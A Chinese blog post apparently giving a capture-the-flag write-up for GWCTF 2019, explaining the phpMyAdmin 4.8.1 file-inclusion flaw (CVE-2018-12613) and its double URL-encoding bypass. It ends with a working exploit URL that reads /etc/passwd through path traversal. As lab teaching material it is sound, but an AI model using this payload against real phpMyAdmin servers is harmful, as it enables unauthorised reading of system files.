[GWCTF 2019]我有一个数据库

该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞
使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入
查看相关版本信息

 

 

  百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

$target_blacklist,target参数黑名单

$target_blacklist = array (
    'import.php', 'export.php'
);

Core::checkPageValidity($_REQUEST['target']),Core类参数校验方法

 1  public static function checkPageValidity(&$page, array $whitelist = [])
 2     {
 3         if (empty($whitelist)) {
 4             $whitelist = self::$goto_whitelist;
 5         }
 6         if (! isset($page) || !is_string($page)) {
 7             return false;
 8         }
 9 
10         if (in_array($page, $whitelist)) {
11             return true;
12         }
13 
14         $_page = mb_substr(
15             $page,
16             0,
17             mb_strpos($page . '?', '?')
18         );
19         if (in_array($_page, $whitelist)) {
20             return true;
21         }
22 
23         $_page = urldecode($page);
24         $_page = mb_substr(
25             $_page,
26             0,
27             mb_strpos($_page . '?', '?')
28         );
29         if (in_array($_page, $whitelist)) {
30             return true;
31         }
32 
33         return false;
34     }

问题在于第23行的urldecode($page)方法,存在二次编码绕过

$_page = urldecode($page);
%25的url编码为%
%3f的url编码为?
%253f-->?

payLoad:
这里target参数只要不是黑名单中php文件就可以

http://725a4060-e628-4f9f-801a-e96075cbfca8.node3.buuoj.cn/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd

 

 flag应该位于系统的根目录

 

 

posted @ 2020-07-12 19:40  GTX690M  阅读(1174)  评论(2编辑  收藏  举报